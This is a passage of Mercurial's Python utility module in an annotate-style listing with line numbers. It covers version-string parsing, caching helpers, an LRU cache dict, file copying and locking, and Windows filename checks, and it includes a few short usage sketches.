965 968 """Return version information if available."""
966 969 try:
967 970 from . import __version__
968 971 return __version__.version
969 972 except ImportError:
970 973 return 'unknown'
971 974
972 975 def versiontuple(v=None, n=4):
973 976 """Parses a Mercurial version string into an N-tuple.
974 977
975 978 The version string to be parsed is specified with the ``v`` argument.
976 979 If it isn't defined, the current Mercurial version string will be parsed.
977 980
978 981 ``n`` can be 2, 3, or 4. Here is how some version strings map to
979 982 returned values:
980 983
981 984 >>> v = b'3.6.1+190-df9b73d2d444'
982 985 >>> versiontuple(v, 2)
983 986 (3, 6)
984 987 >>> versiontuple(v, 3)
985 988 (3, 6, 1)
986 989 >>> versiontuple(v, 4)
987 990 (3, 6, 1, '190-df9b73d2d444')
988 991
989 992 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
990 993 (3, 6, 1, '190-df9b73d2d444+20151118')
991 994
992 995 >>> v = b'3.6'
993 996 >>> versiontuple(v, 2)
994 997 (3, 6)
995 998 >>> versiontuple(v, 3)
996 999 (3, 6, None)
997 1000 >>> versiontuple(v, 4)
998 1001 (3, 6, None, None)
999 1002
1000 1003 >>> v = b'3.9-rc'
1001 1004 >>> versiontuple(v, 2)
1002 1005 (3, 9)
1003 1006 >>> versiontuple(v, 3)
1004 1007 (3, 9, None)
1005 1008 >>> versiontuple(v, 4)
1006 1009 (3, 9, None, 'rc')
1007 1010
1008 1011 >>> v = b'3.9-rc+2-02a8fea4289b'
1009 1012 >>> versiontuple(v, 2)
1010 1013 (3, 9)
1011 1014 >>> versiontuple(v, 3)
1012 1015 (3, 9, None)
1013 1016 >>> versiontuple(v, 4)
1014 1017 (3, 9, None, 'rc+2-02a8fea4289b')
1015 1018
1016 1019 >>> versiontuple(b'4.6rc0')
1017 1020 (4, 6, None, 'rc0')
1018 1021 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1019 1022 (4, 6, None, 'rc0+12-425d55e54f98')
1020 1023 >>> versiontuple(b'.1.2.3')
1021 1024 (None, None, None, '.1.2.3')
1022 1025 >>> versiontuple(b'12.34..5')
1023 1026 (12, 34, None, '..5')
1024 1027 >>> versiontuple(b'1.2.3.4.5.6')
1025 1028 (1, 2, 3, '.4.5.6')
1026 1029 """
1027 1030 if not v:
1028 1031 v = version()
1029 1032 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1030 1033 if not m:
1031 1034 vparts, extra = '', v
1032 1035 elif m.group(2):
1033 1036 vparts, extra = m.groups()
1034 1037 else:
1035 1038 vparts, extra = m.group(1), None
1036 1039
1037 1040 vints = []
1038 1041 for i in vparts.split('.'):
1039 1042 try:
1040 1043 vints.append(int(i))
1041 1044 except ValueError:
1042 1045 break
1043 1046 # (3, 6) -> (3, 6, None)
1044 1047 while len(vints) < 3:
1045 1048 vints.append(None)
1046 1049
1047 1050 if n == 2:
1048 1051 return (vints[0], vints[1])
1049 1052 if n == 3:
1050 1053 return (vints[0], vints[1], vints[2])
1051 1054 if n == 4:
1052 1055 return (vints[0], vints[1], vints[2], extra)
1053 1056
1054 1057 def cachefunc(func):
1055 1058 '''cache the result of function calls'''
1056 1059 # XXX doesn't handle keywords args
1057 1060 if func.__code__.co_argcount == 0:
1058 1061 cache = []
1059 1062 def f():
1060 1063 if len(cache) == 0:
1061 1064 cache.append(func())
1062 1065 return cache[0]
1063 1066 return f
1064 1067 cache = {}
1065 1068 if func.__code__.co_argcount == 1:
1066 1069 # we gain a small amount of time because
1067 1070 # we don't need to pack/unpack the list
1068 1071 def f(arg):
1069 1072 if arg not in cache:
1070 1073 cache[arg] = func(arg)
1071 1074 return cache[arg]
1072 1075 else:
1073 1076 def f(*args):
1074 1077 if args not in cache:
1075 1078 cache[args] = func(*args)
1076 1079 return cache[args]
1077 1080
1078 1081 return f
1079 1082
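# cachefunc usage sketch: results are memoized on the (hashable)
# positional arguments, so repeated calls skip the wrapped function.
def _democachefunc():
    calls = []

    @cachefunc
    def square(x):
        calls.append(x)
        return x * x

    square(3)
    square(3)
    return square(3), len(calls)  # (9, 1): computed only once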
1080 1083 class cow(object):
1081 1084 """helper class to make copy-on-write easier
1082 1085
1083 1086 Call preparewrite before doing any writes.
1084 1087 """
1085 1088
1086 1089 def preparewrite(self):
1087 1090 """call this before writes, return self or a copied new object"""
1088 1091 if getattr(self, '_copied', 0):
1089 1092 self._copied -= 1
1090 1093 return self.__class__(self)
1091 1094 return self
1092 1095
1093 1096 def copy(self):
1094 1097 """always do a cheap copy"""
1095 1098 self._copied = getattr(self, '_copied', 0) + 1
1096 1099 return self
1097 1100
1098 1101 class sortdict(collections.OrderedDict):
1099 1102 '''a simple sorted dictionary
1100 1103
1101 1104 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1102 1105 >>> d2 = d1.copy()
1103 1106 >>> d2
1104 1107 sortdict([('a', 0), ('b', 1)])
1105 1108 >>> d2.update([(b'a', 2)])
1106 1109 >>> list(d2.keys()) # should still be in last-set order
1107 1110 ['b', 'a']
1108 1111 '''
1109 1112
1110 1113 def __setitem__(self, key, value):
1111 1114 if key in self:
1112 1115 del self[key]
1113 1116 super(sortdict, self).__setitem__(key, value)
1114 1117
1115 1118 if pycompat.ispypy:
1116 1119 # __setitem__() isn't called as of PyPy 5.8.0
1117 1120 def update(self, src):
1118 1121 if isinstance(src, dict):
1119 1122 src = src.iteritems()
1120 1123 for k, v in src:
1121 1124 self[k] = v
1122 1125
1123 1126 class cowdict(cow, dict):
1124 1127 """copy-on-write dict
1125 1128
1126 1129 Be sure to call d = d.preparewrite() before writing to d.
1127 1130
1128 1131 >>> a = cowdict()
1129 1132 >>> a is a.preparewrite()
1130 1133 True
1131 1134 >>> b = a.copy()
1132 1135 >>> b is a
1133 1136 True
1134 1137 >>> c = b.copy()
1135 1138 >>> c is a
1136 1139 True
1137 1140 >>> a = a.preparewrite()
1138 1141 >>> b is a
1139 1142 False
1140 1143 >>> a is a.preparewrite()
1141 1144 True
1142 1145 >>> c = c.preparewrite()
1143 1146 >>> b is c
1144 1147 False
1145 1148 >>> b is b.preparewrite()
1146 1149 True
1147 1150 """
1148 1151
1149 1152 class cowsortdict(cow, sortdict):
1150 1153 """copy-on-write sortdict
1151 1154
1152 1155 Be sure to call d = d.preparewrite() before writing to d.
1153 1156 """
1154 1157
1155 1158 class transactional(object):
1156 1159 """Base class for making a transactional type into a context manager."""
1157 1160 __metaclass__ = abc.ABCMeta
1158 1161
1159 1162 @abc.abstractmethod
1160 1163 def close(self):
1161 1164 """Successfully closes the transaction."""
1162 1165
1163 1166 @abc.abstractmethod
1164 1167 def release(self):
1165 1168 """Marks the end of the transaction.
1166 1169
1167 1170 If the transaction has not been closed, it will be aborted.
1168 1171 """
1169 1172
1170 1173 def __enter__(self):
1171 1174 return self
1172 1175
1173 1176 def __exit__(self, exc_type, exc_val, exc_tb):
1174 1177 try:
1175 1178 if exc_type is None:
1176 1179 self.close()
1177 1180 finally:
1178 1181 self.release()
1179 1182
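# A minimal transactional subclass sketch (hypothetical class, for
# illustration only): on a clean exit __exit__ calls close() and then
# release(); on an exception only release() runs, aborting the
# transaction.
def _demotransactional():
    class _tx(transactional):
        closed = released = False

        def close(self):
            self.closed = True

        def release(self):
            self.released = True

    tx = _tx()
    with tx:
        pass
    return tx.closed and tx.released  # True on a clean exit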
1180 1183 @contextlib.contextmanager
1181 1184 def acceptintervention(tr=None):
1182 1185 """A context manager that closes the transaction on InterventionRequired
1183 1186
1184 1187 If no transaction was provided, this simply runs the body and returns.
1185 1188 """
1186 1189 if not tr:
1187 1190 yield
1188 1191 return
1189 1192 try:
1190 1193 yield
1191 1194 tr.close()
1192 1195 except error.InterventionRequired:
1193 1196 tr.close()
1194 1197 raise
1195 1198 finally:
1196 1199 tr.release()
1197 1200
1198 1201 @contextlib.contextmanager
1199 1202 def nullcontextmanager():
1200 1203 yield
1201 1204
1202 1205 class _lrucachenode(object):
1203 1206 """A node in a doubly linked list.
1204 1207
1205 1208 Holds a reference to nodes on either side as well as a key-value
1206 1209 pair for the dictionary entry.
1207 1210 """
1208 1211 __slots__ = (u'next', u'prev', u'key', u'value')
1209 1212
1210 1213 def __init__(self):
1211 1214 self.next = None
1212 1215 self.prev = None
1213 1216
1214 1217 self.key = _notset
1215 1218 self.value = None
1216 1219
1217 1220 def markempty(self):
1218 1221 """Mark the node as emptied."""
1219 1222 self.key = _notset
1220 1223
1221 1224 class lrucachedict(object):
1222 1225 """Dict that caches most recent accesses and sets.
1223 1226
1224 1227 The dict consists of an actual backing dict - indexed by original
1225 1228 key - and a doubly linked circular list defining the order of entries in
1226 1229 the cache.
1227 1230
1228 1231 The head node is the newest entry in the cache. If the cache is full,
1229 1232 we recycle head.prev and make it the new head. Cache accesses result in
1230 1233 the node being moved to before the existing head and being marked as the
1231 1234 new head node.
1232 1235 """
1233 1236 def __init__(self, max):
1234 1237 self._cache = {}
1235 1238
1236 1239 self._head = head = _lrucachenode()
1237 1240 head.prev = head
1238 1241 head.next = head
1239 1242 self._size = 1
1240 1243 self._capacity = max
1241 1244
1242 1245 def __len__(self):
1243 1246 return len(self._cache)
1244 1247
1245 1248 def __contains__(self, k):
1246 1249 return k in self._cache
1247 1250
1248 1251 def __iter__(self):
1249 1252 # We don't have to iterate in cache order, but why not.
1250 1253 n = self._head
1251 1254 for i in range(len(self._cache)):
1252 1255 yield n.key
1253 1256 n = n.next
1254 1257
1255 1258 def __getitem__(self, k):
1256 1259 node = self._cache[k]
1257 1260 self._movetohead(node)
1258 1261 return node.value
1259 1262
1260 1263 def __setitem__(self, k, v):
1261 1264 node = self._cache.get(k)
1262 1265 # Replace existing value and mark as newest.
1263 1266 if node is not None:
1264 1267 node.value = v
1265 1268 self._movetohead(node)
1266 1269 return
1267 1270
1268 1271 if self._size < self._capacity:
1269 1272 node = self._addcapacity()
1270 1273 else:
1271 1274 # Grab the last/oldest item.
1272 1275 node = self._head.prev
1273 1276
1274 1277 # At capacity. Kill the old entry.
1275 1278 if node.key is not _notset:
1276 1279 del self._cache[node.key]
1277 1280
1278 1281 node.key = k
1279 1282 node.value = v
1280 1283 self._cache[k] = node
1281 1284 # And mark it as newest entry. No need to adjust order since it
1282 1285 # is already self._head.prev.
1283 1286 self._head = node
1284 1287
1285 1288 def __delitem__(self, k):
1286 1289 node = self._cache.pop(k)
1287 1290 node.markempty()
1288 1291
1289 1292 # Temporarily mark as newest item before re-adjusting head to make
1290 1293 # this node the oldest item.
1291 1294 self._movetohead(node)
1292 1295 self._head = node.next
1293 1296
1294 1297 # Additional dict methods.
1295 1298
1296 1299 def get(self, k, default=None):
1297 1300 try:
1298 1301 return self._cache[k].value
1299 1302 except KeyError:
1300 1303 return default
1301 1304
1302 1305 def clear(self):
1303 1306 n = self._head
1304 1307 while n.key is not _notset:
1305 1308 n.markempty()
1306 1309 n = n.next
1307 1310
1308 1311 self._cache.clear()
1309 1312
1310 1313 def copy(self):
1311 1314 result = lrucachedict(self._capacity)
1312 1315 n = self._head.prev
1313 1316 # Iterate in oldest-to-newest order, so the copy has the right ordering
1314 1317 for i in range(len(self._cache)):
1315 1318 result[n.key] = n.value
1316 1319 n = n.prev
1317 1320 return result
1318 1321
1319 1322 def _movetohead(self, node):
1320 1323 """Mark a node as the newest, making it the new head.
1321 1324
1322 1325 When a node is accessed, it becomes the freshest entry in the LRU
1323 1326 list, which is denoted by self._head.
1324 1327
1325 1328 Visually, let's make ``N`` the new head node (* denotes head):
1326 1329
1327 1330 previous/oldest <-> head <-> next/next newest
1328 1331
1329 1332 ----<->--- A* ---<->-----
1330 1333 | |
1331 1334 E <-> D <-> N <-> C <-> B
1332 1335
1333 1336 To:
1334 1337
1335 1338 ----<->--- N* ---<->-----
1336 1339 | |
1337 1340 E <-> D <-> C <-> B <-> A
1338 1341
1339 1342 This requires the following moves:
1340 1343
1341 1344 C.next = D (node.prev.next = node.next)
1342 1345 D.prev = C (node.next.prev = node.prev)
1343 1346 E.next = N (head.prev.next = node)
1344 1347 N.prev = E (node.prev = head.prev)
1345 1348 N.next = A (node.next = head)
1346 1349 A.prev = N (head.prev = node)
1347 1350 """
1348 1351 head = self._head
1349 1352 # C.next = D
1350 1353 node.prev.next = node.next
1351 1354 # D.prev = C
1352 1355 node.next.prev = node.prev
1353 1356 # N.prev = E
1354 1357 node.prev = head.prev
1355 1358 # N.next = A
1356 1359 # It is tempting to do just "head" here, however if node is
1357 1360 # adjacent to head, this will do bad things.
1358 1361 node.next = head.prev.next
1359 1362 # E.next = N
1360 1363 node.next.prev = node
1361 1364 # A.prev = N
1362 1365 node.prev.next = node
1363 1366
1364 1367 self._head = node
1365 1368
1366 1369 def _addcapacity(self):
1367 1370 """Add a node to the circular linked list.
1368 1371
1369 1372 The new node is inserted before the head node.
1370 1373 """
1371 1374 head = self._head
1372 1375 node = _lrucachenode()
1373 1376 head.prev.next = node
1374 1377 node.prev = head.prev
1375 1378 node.next = head
1376 1379 head.prev = node
1377 1380 self._size += 1
1378 1381 return node
1379 1382
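# lrucachedict usage sketch: once the cache is at capacity, inserting a
# new key recycles the oldest node, and plain reads refresh recency.
def _demolrucachedict():
    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']        # touch 'a'; 'b' is now the oldest entry
    d['c'] = 3    # at capacity: evicts 'b'
    return 'a' in d, 'b' in d  # (True, False)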
1380 1383 def lrucachefunc(func):
1381 1384 '''cache most recent results of function calls'''
1382 1385 cache = {}
1383 1386 order = collections.deque()
1384 1387 if func.__code__.co_argcount == 1:
1385 1388 def f(arg):
1386 1389 if arg not in cache:
1387 1390 if len(cache) > 20:
1388 1391 del cache[order.popleft()]
1389 1392 cache[arg] = func(arg)
1390 1393 else:
1391 1394 order.remove(arg)
1392 1395 order.append(arg)
1393 1396 return cache[arg]
1394 1397 else:
1395 1398 def f(*args):
1396 1399 if args not in cache:
1397 1400 if len(cache) > 20:
1398 1401 del cache[order.popleft()]
1399 1402 cache[args] = func(*args)
1400 1403 else:
1401 1404 order.remove(args)
1402 1405 order.append(args)
1403 1406 return cache[args]
1404 1407
1405 1408 return f
1406 1409
1407 1410 class propertycache(object):
1408 1411 def __init__(self, func):
1409 1412 self.func = func
1410 1413 self.name = func.__name__
1411 1414 def __get__(self, obj, type=None):
1412 1415 result = self.func(obj)
1413 1416 self.cachevalue(obj, result)
1414 1417 return result
1415 1418
1416 1419 def cachevalue(self, obj, value):
1417 1420 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1418 1421 obj.__dict__[self.name] = value
1419 1422
1420 1423 def clearcachedproperty(obj, prop):
1421 1424 '''clear a cached property value, if one has been set'''
1422 1425 if prop in obj.__dict__:
1423 1426 del obj.__dict__[prop]
1424 1427
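# propertycache usage sketch: the first access runs the wrapped function
# and stores the result in the instance __dict__, which then shadows the
# (non-data) descriptor, so later accesses are plain attribute lookups.
def _demopropertycache():
    class _thing(object):
        computed = 0

        @propertycache
        def answer(self):
            self.computed += 1
            return 42

    t = _thing()
    t.answer
    t.answer
    return t.computed  # 1: the second access never reached the function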
1425 1428 def increasingchunks(source, min=1024, max=65536):
1426 1429 '''return no less than min bytes per chunk while data remains,
1427 1430 doubling min after each chunk until it reaches max'''
1428 1431 def log2(x):
1429 1432 if not x:
1430 1433 return 0
1431 1434 i = 0
1432 1435 while x:
1433 1436 x >>= 1
1434 1437 i += 1
1435 1438 return i - 1
1436 1439
1437 1440 buf = []
1438 1441 blen = 0
1439 1442 for chunk in source:
1440 1443 buf.append(chunk)
1441 1444 blen += len(chunk)
1442 1445 if blen >= min:
1443 1446 if min < max:
1444 1447 min = min << 1
1445 1448 nmin = 1 << log2(blen)
1446 1449 if nmin > min:
1447 1450 min = nmin
1448 1451 if min > max:
1449 1452 min = max
1450 1453 yield ''.join(buf)
1451 1454 blen = 0
1452 1455 buf = []
1453 1456 if buf:
1454 1457 yield ''.join(buf)
1455 1458
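# increasingchunks sketch: chunk sizes ramp from min toward max, so long
# streams pay fewer yields as they go. The byte math assumes the
# bytes-native str of Python 2 used throughout this module.
def _demoincreasingchunks():
    source = ('x' * 512 for _ in range(16))
    return [len(c) for c in increasingchunks(source, min=1024, max=4096)]
    # [1024, 2048, 4096, 1024]: doubling until capped at max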
1456 1459 def always(fn):
1457 1460 return True
1458 1461
1459 1462 def never(fn):
1460 1463 return False
1461 1464
1462 1465 def nogc(func):
1463 1466 """disable garbage collector
1464 1467
1465 1468 Python's garbage collector triggers a GC each time a certain number of
1466 1469 container objects (the number being defined by gc.get_threshold()) are
1467 1470 allocated even when marked not to be tracked by the collector. Tracking has
1468 1471 no effect on when GCs are triggered, only on what objects the GC looks
1469 1472 into. As a workaround, disable GC while building complex (huge)
1470 1473 containers.
1471 1474
1472 1475 This garbage collector issue has been fixed in 2.7, but it still
1473 1476 affects CPython's performance.
1474 1477 """
1475 1478 def wrapper(*args, **kwargs):
1476 1479 gcenabled = gc.isenabled()
1477 1480 gc.disable()
1478 1481 try:
1479 1482 return func(*args, **kwargs)
1480 1483 finally:
1481 1484 if gcenabled:
1482 1485 gc.enable()
1483 1486 return wrapper
1484 1487
1485 1488 if pycompat.ispypy:
1486 1489 # PyPy runs slower with gc disabled
1487 1490 nogc = lambda x: x
1488 1491
1489 1492 def pathto(root, n1, n2):
1490 1493 '''return the relative path from one place to another.
1491 1494 root should use os.sep to separate directories
1492 1495 n1 should use os.sep to separate directories
1493 1496 n2 should use "/" to separate directories
1494 1497 returns an os.sep-separated path.
1495 1498
1496 1499 If n1 is a relative path, it's assumed it's
1497 1500 relative to root.
1498 1501 n2 should always be relative to root.
1499 1502 '''
1500 1503 if not n1:
1501 1504 return localpath(n2)
1502 1505 if os.path.isabs(n1):
1503 1506 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1504 1507 return os.path.join(root, localpath(n2))
1505 1508 n2 = '/'.join((pconvert(root), n2))
1506 1509 a, b = splitpath(n1), n2.split('/')
1507 1510 a.reverse()
1508 1511 b.reverse()
1509 1512 while a and b and a[-1] == b[-1]:
1510 1513 a.pop()
1511 1514 b.pop()
1512 1515 b.reverse()
1513 1516 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1514 1517
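# pathto sketch (POSIX separators assumed): the shared leading component
# 'a' is popped from both sides, leaving one '..' per remaining component
# of n1.
def _demopathto():
    return pathto('/repo', 'a/b', 'a/c/other')  # '../c/other'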
1515 1518 # the location of data files matching the source code
1516 1519 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1517 1520 # executable version (py2exe) doesn't support __file__
1518 1521 datapath = os.path.dirname(pycompat.sysexecutable)
1519 1522 else:
1520 1523 datapath = os.path.dirname(pycompat.fsencode(__file__))
1521 1524
1522 1525 i18n.setdatapath(datapath)
1523 1526
1524 1527 def checksignature(func):
1525 1528 '''wrap a function with code to check for calling errors'''
1526 1529 def check(*args, **kwargs):
1527 1530 try:
1528 1531 return func(*args, **kwargs)
1529 1532 except TypeError:
1530 1533 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1531 1534 raise error.SignatureError
1532 1535 raise
1533 1536
1534 1537 return check
1535 1538
1536 1539 # a whitelist of known filesystems where hardlinks work reliably
1537 1540 _hardlinkfswhitelist = {
1538 1541 'apfs',
1539 1542 'btrfs',
1540 1543 'ext2',
1541 1544 'ext3',
1542 1545 'ext4',
1543 1546 'hfs',
1544 1547 'jfs',
1545 1548 'NTFS',
1546 1549 'reiserfs',
1547 1550 'tmpfs',
1548 1551 'ufs',
1549 1552 'xfs',
1550 1553 'zfs',
1551 1554 }
1552 1555
1553 1556 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1554 1557 '''copy a file, preserving mode and optionally other stat info like
1555 1558 atime/mtime
1556 1559
1557 1560 checkambig argument is used with filestat, and is useful only if
1558 1561 destination file is guarded by any lock (e.g. repo.lock or
1559 1562 repo.wlock).
1560 1563
1561 1564 copystat and checkambig should be exclusive.
1562 1565 '''
1563 1566 assert not (copystat and checkambig)
1564 1567 oldstat = None
1565 1568 if os.path.lexists(dest):
1566 1569 if checkambig:
1567 1570 oldstat = checkambig and filestat.frompath(dest)
1568 1571 unlink(dest)
1569 1572 if hardlink:
1570 1573 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1571 1574 # unless we are confident that dest is on a whitelisted filesystem.
1572 1575 try:
1573 1576 fstype = getfstype(os.path.dirname(dest))
1574 1577 except OSError:
1575 1578 fstype = None
1576 1579 if fstype not in _hardlinkfswhitelist:
1577 1580 hardlink = False
1578 1581 if hardlink:
1579 1582 try:
1580 1583 oslink(src, dest)
1581 1584 return
1582 1585 except (IOError, OSError):
1583 1586 pass # fall back to normal copy
1584 1587 if os.path.islink(src):
1585 1588 os.symlink(os.readlink(src), dest)
1586 1589 # copytime is ignored for symlinks, but in general copytime isn't needed
1587 1590 # for them anyway
1588 1591 else:
1589 1592 try:
1590 1593 shutil.copyfile(src, dest)
1591 1594 if copystat:
1592 1595 # copystat also copies mode
1593 1596 shutil.copystat(src, dest)
1594 1597 else:
1595 1598 shutil.copymode(src, dest)
1596 1599 if oldstat and oldstat.stat:
1597 1600 newstat = filestat.frompath(dest)
1598 1601 if newstat.isambig(oldstat):
1599 1602 # stat of copied file is ambiguous to original one
1600 1603 advanced = (
1601 1604 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1602 1605 os.utime(dest, (advanced, advanced))
1603 1606 except shutil.Error as inst:
1604 1607 raise error.Abort(str(inst))
1605 1608
1606 1609 def copyfiles(src, dst, hardlink=None, progress=None):
1607 1610 """Copy a directory tree using hardlinks if possible."""
1608 1611 num = 0
1609 1612
1610 1613 def settopic():
1611 1614 if progress:
1612 1615 progress.topic = _('linking') if hardlink else _('copying')
1613 1616
1614 1617 if os.path.isdir(src):
1615 1618 if hardlink is None:
1616 1619 hardlink = (os.stat(src).st_dev ==
1617 1620 os.stat(os.path.dirname(dst)).st_dev)
1618 1621 settopic()
1619 1622 os.mkdir(dst)
1620 1623 for name, kind in listdir(src):
1621 1624 srcname = os.path.join(src, name)
1622 1625 dstname = os.path.join(dst, name)
1623 1626 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1624 1627 num += n
1625 1628 else:
1626 1629 if hardlink is None:
1627 1630 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1628 1631 os.stat(os.path.dirname(dst)).st_dev)
1629 1632 settopic()
1630 1633
1631 1634 if hardlink:
1632 1635 try:
1633 1636 oslink(src, dst)
1634 1637 except (IOError, OSError):
1635 1638 hardlink = False
1636 1639 shutil.copy(src, dst)
1637 1640 else:
1638 1641 shutil.copy(src, dst)
1639 1642 num += 1
1640 1643 if progress:
1641 1644 progress.increment()
1642 1645
1643 1646 return hardlink, num
1644 1647
1645 1648 _winreservednames = {
1646 1649 'con', 'prn', 'aux', 'nul',
1647 1650 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1648 1651 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1649 1652 }
1650 1653 _winreservedchars = ':*?"<>|'
1651 1654 def checkwinfilename(path):
1652 1655 r'''Check that the base-relative path is a valid filename on Windows.
1653 1656 Returns None if the path is ok, or a UI string describing the problem.
1654 1657
1655 1658 >>> checkwinfilename(b"just/a/normal/path")
1656 1659 >>> checkwinfilename(b"foo/bar/con.xml")
1657 1660 "filename contains 'con', which is reserved on Windows"
1658 1661 >>> checkwinfilename(b"foo/con.xml/bar")
1659 1662 "filename contains 'con', which is reserved on Windows"
1660 1663 >>> checkwinfilename(b"foo/bar/xml.con")
1661 1664 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1662 1665 "filename contains 'AUX', which is reserved on Windows"
1663 1666 >>> checkwinfilename(b"foo/bar/bla:.txt")
1664 1667 "filename contains ':', which is reserved on Windows"
1665 1668 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1666 1669 "filename contains '\\x07', which is invalid on Windows"
1667 1670 >>> checkwinfilename(b"foo/bar/bla ")
1668 1671 "filename ends with ' ', which is not allowed on Windows"
1669 1672 >>> checkwinfilename(b"../bar")
1670 1673 >>> checkwinfilename(b"foo\\")
1671 1674 "filename ends with '\\', which is invalid on Windows"
1672 1675 >>> checkwinfilename(b"foo\\/bar")
1673 1676 "directory name ends with '\\', which is invalid on Windows"
1674 1677 '''
1675 1678 if path.endswith('\\'):
1676 1679 return _("filename ends with '\\', which is invalid on Windows")
1677 1680 if '\\/' in path:
1678 1681 return _("directory name ends with '\\', which is invalid on Windows")
1679 1682 for n in path.replace('\\', '/').split('/'):
1680 1683 if not n:
1681 1684 continue
1682 1685 for c in _filenamebytestr(n):
1683 1686 if c in _winreservedchars:
1684 1687 return _("filename contains '%s', which is reserved "
1685 1688 "on Windows") % c
1686 1689 if ord(c) <= 31:
1687 1690 return _("filename contains '%s', which is invalid "
1688 1691 "on Windows") % stringutil.escapestr(c)
1689 1692 base = n.split('.')[0]
1690 1693 if base and base.lower() in _winreservednames:
1691 1694 return _("filename contains '%s', which is reserved "
1692 1695 "on Windows") % base
1693 1696 t = n[-1:]
1694 1697 if t in '. ' and n not in '..':
1695 1698 return _("filename ends with '%s', which is not allowed "
1696 1699 "on Windows") % t
1697 1700
1698 1701 if pycompat.iswindows:
1699 1702 checkosfilename = checkwinfilename
1700 1703 timer = time.clock
1701 1704 else:
1702 1705 checkosfilename = platform.checkosfilename
1703 1706 timer = time.time
1704 1707
1705 1708 if safehasattr(time, "perf_counter"):
1706 1709 timer = time.perf_counter
1707 1710
1708 1711 def makelock(info, pathname):
1709 1712 """Create a lock file atomically if possible
1710 1713
1711 1714 This may leave a stale lock file if symlink isn't supported and signal
1712 1715 interrupt is enabled.
1713 1716 """
1714 1717 try:
1715 1718 return os.symlink(info, pathname)
1716 1719 except OSError as why:
1717 1720 if why.errno == errno.EEXIST:
1718 1721 raise
1719 1722 except AttributeError: # no symlink in os
1720 1723 pass
1721 1724
1722 1725 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1723 1726 ld = os.open(pathname, flags)
1724 1727 os.write(ld, info)
1725 1728 os.close(ld)
1726 1729
1727 1730 def readlock(pathname):
1728 1731 try:
1729 1732 return os.readlink(pathname)
1730 1733 except OSError as why:
1731 1734 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1732 1735 raise
1733 1736 except AttributeError: # no symlink in os
1734 1737 pass
1735 1738 fp = posixfile(pathname, 'rb')
1736 1739 r = fp.read()
1737 1740 fp.close()
1738 1741 return r
1739 1742
1740 1743 def fstat(fp):
1741 1744 '''stat file object that may not have fileno method.'''
1742 1745 try:
1743 1746 return os.fstat(fp.fileno())
1744 1747 except AttributeError:
1745 1748 return os.stat(fp.name)
1746 1749
1747 1750 # File system features
1748 1751
1749 1752 def fscasesensitive(path):
1750 1753 """
1751 1754 Return true if the given path is on a case-sensitive filesystem
1752 1755
1753 1756 Requires a path (like /foo/.hg) ending with a foldable final
1754 1757 directory component.
1755 1758 """
1756 1759 s1 = os.lstat(path)
1757 1760 d, b = os.path.split(path)
1758 1761 b2 = b.upper()
1759 1762 if b == b2:
1760 1763 b2 = b.lower()
1761 1764 if b == b2:
1762 1765 return True # no evidence against case sensitivity
1763 1766 p2 = os.path.join(d, b2)
1764 1767 try:
1765 1768 s2 = os.lstat(p2)
1766 1769 if s2 == s1:
1767 1770 return False
1768 1771 return True
1769 1772 except OSError:
1770 1773 return True
1771 1774
1772 1775 try:
1773 1776 import re2
1774 1777 _re2 = None
1775 1778 except ImportError:
1776 1779 _re2 = False
1777 1780
1778 1781 class _re(object):
1779 1782 def _checkre2(self):
1780 1783 global _re2
1781 1784 try:
1782 1785 # check if match works, see issue3964
1783 1786 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1784 1787 except ImportError:
1785 1788 _re2 = False
1786 1789
1787 1790 def compile(self, pat, flags=0):
1788 1791 '''Compile a regular expression, using re2 if possible
1789 1792
1790 1793 For best performance, use only re2-compatible regexp features. The
1791 1794 only flags from the re module that are re2-compatible are
1792 1795 IGNORECASE and MULTILINE.'''
1793 1796 if _re2 is None:
1794 1797 self._checkre2()
1795 1798 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1796 1799 if flags & remod.IGNORECASE:
1797 1800 pat = '(?i)' + pat
1798 1801 if flags & remod.MULTILINE:
1799 1802 pat = '(?m)' + pat
1800 1803 try:
1801 1804 return re2.compile(pat)
1802 1805 except re2.error:
1803 1806 pass
1804 1807 return remod.compile(pat, flags)
1805 1808
1806 1809 @propertycache
1807 1810 def escape(self):
1808 1811 '''Return the version of escape corresponding to self.compile.
1809 1812
1810 1813 This is imperfect because whether re2 or re is used for a particular
1811 1814 function depends on the flags, etc, but it's the best we can do.
1812 1815 '''
1813 1816 global _re2
1814 1817 if _re2 is None:
1815 1818 self._checkre2()
1816 1819 if _re2:
1817 1820 return re2.escape
1818 1821 else:
1819 1822 return remod.escape
1820 1823
1821 1824 re = _re()
1822 1825
1823 1826 _fspathcache = {}
1824 1827 def fspath(name, root):
1825 1828 '''Get name in the case stored in the filesystem
1826 1829
1827 1830 The name should be relative to root, and be normcase-ed for efficiency.
1828 1831
1829 1832 Note that this function is unnecessary, and should not be
1830 1833 called, for case-sensitive filesystems (simply because it's expensive).
1831 1834
1832 1835 The root should be normcase-ed, too.
1833 1836 '''
1834 1837 def _makefspathcacheentry(dir):
1835 1838 return dict((normcase(n), n) for n in os.listdir(dir))
1836 1839
1837 1840 seps = pycompat.ossep
1838 1841 if pycompat.osaltsep:
1839 1842 seps = seps + pycompat.osaltsep
1840 1843 # Protect backslashes. This gets silly very quickly.
1841 1844 seps = seps.replace('\\', '\\\\')
